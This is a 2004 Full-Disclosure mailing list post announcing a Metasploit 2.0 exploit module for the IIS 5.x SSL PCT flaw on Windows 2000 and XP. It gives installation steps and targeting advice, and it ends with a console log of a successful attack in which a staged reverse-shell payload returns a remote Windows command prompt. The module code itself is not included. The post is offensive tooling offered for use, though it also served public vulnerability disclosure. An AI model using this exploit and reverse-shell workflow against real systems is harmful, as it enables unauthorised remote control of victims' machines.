Attached is an exploit module for version 2.0 of the Metasploit
Framework. This module was based on Johnny Cyberpunk's code and includes
some interesting improvements:
- Targets for Windows 2000 and Windows XP
- SSL request modified to allow exploitation on Windows XP
- Use of ExitThread allows repeatable exploitation
- Shellcode is limited to 1800 bytes or so...
To use this module, copy the attached file into the "exploits"
subdirectory of the Metasploit Framework 2.0 installation. Win32 users
should copy this file into $BASE\home\framework-2.0\exploits, where $BASE
is where you installed the Framework.
If for some reason you don't have the Metasploit Framework installed, grab
it from the following URL:
http://metasploit.com/projects/Framework/
If you specify the wrong offset, LSASS will stop functioning (but not
crash!), so make sure you know your targets. This module has been tested
against most Windows 2000 and Windows XP versions (English only, sorry).
Cheers,
HD and spoonm
______________________________________
msf iis5x_ssl_pct(winreverse_stg) > exploit
[*] Starting Reverse Handler.
[*] Attempting to exploit target Windows XP SP1
[*] Sending 329 bytes to remote host.
[*] Waiting for a response...
[*] Got connection from 192.168.50.98:1038
[*] Sending Stage (115 bytes)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2.1.8 : Sat Apr 24 2004 - 07:04:54 EDT
